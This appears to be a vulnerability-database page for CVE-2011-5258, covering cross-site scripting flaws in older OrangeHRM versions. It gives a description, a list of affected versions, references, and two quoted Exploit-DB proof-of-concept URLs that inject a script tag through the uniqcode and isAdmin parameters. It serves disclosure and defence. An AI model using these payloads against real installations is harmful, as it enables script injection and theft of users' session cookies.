CVE-2011-5258
Description
Multiple cross-site scripting (XSS) vulnerabilities in OrangeHRM before 2.6.11.2 allow remote attackers to inject arbitrary web script or HTML via the (1) uniqcode or (2) isAdmin parameter to index.php; or the (3) PATH_INFO to lib/controllers/centralcontroller.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
OrangeHRM 2.6.11 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/50857/info
OrangeHRM is prone to an SQL-injection and multiple cross-site scripting vulnerabilities.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
OrangeHRM 2.6.11 is vulnerable; prior versions may also be affected.
http://www.example.com/index.php?menu_no_top=eim&uniqcode=%22%3E%3C/iframe%3E%3Cscript%3Ealert%28123%29;% 3C/script%3E
http://www.example.com/index.php?menu_no_top=eim&uniqcode=USR&isAdmin=%22%3E%3C/iframe%3E%3Cscript%3E alert%28123%29;%3C/script%3E
OrangeHRM 2.6.11 - 'lib/controllers/CentralController.php' URI Cross-Site Scripting
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| orangehrm | orangehrm | {"endIncluding":"2.6.11"} | |
| orangehrm | orangehrm | 2.6.0 | |
| orangehrm | orangehrm | 2.6.0.1 | |
| orangehrm | orangehrm | 2.6.1 | |
| orangehrm | orangehrm | 2.6.2 | |
| orangehrm | orangehrm | 2.6.3 | |
| orangehrm | orangehrm | 2.6.4 | |
| orangehrm | orangehrm | 2.6.5 | |
| orangehrm | orangehrm | 2.6.6 | |
| orangehrm | orangehrm | 2.6.7 | |
| orangehrm | orangehrm | 2.6.8 | |
| orangehrm | orangehrm | 2.6.8.1 | |
| orangehrm | orangehrm | 2.6.9 | |
| orangehrm | orangehrm | 2.6.10 | |
References
- http://blog.orangehrm.com/2011/12/09/security-vulnerabilities-fixed-with-orangehrm-26112/
- http://osvdb.org/show/osvdb/77416
- http://osvdb.org/show/osvdb/77417
- http://secunia.com/advisories/47014
- http://www.securityfocus.com/archive/1/520684/100/0/threaded
- http://www.securityfocus.com/bid/50857
- https://exchange.xforce.ibmcloud.com/vulnerabilities/71568
- https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_orangehrm.html
- http://blog.orangehrm.com/2011/12/09/security-vulnerabilities-fixed-with-orangehrm-26112/
- http://osvdb.org/show/osvdb/77416
- http://osvdb.org/show/osvdb/77417
- http://secunia.com/advisories/47014
- http://www.securityfocus.com/archive/1/520684/100/0/threaded
- http://www.securityfocus.com/bid/50857
- https://exchange.xforce.ibmcloud.com/vulnerabilities/71568
- https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_orangehrm.html
CWEs
CWE-79
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.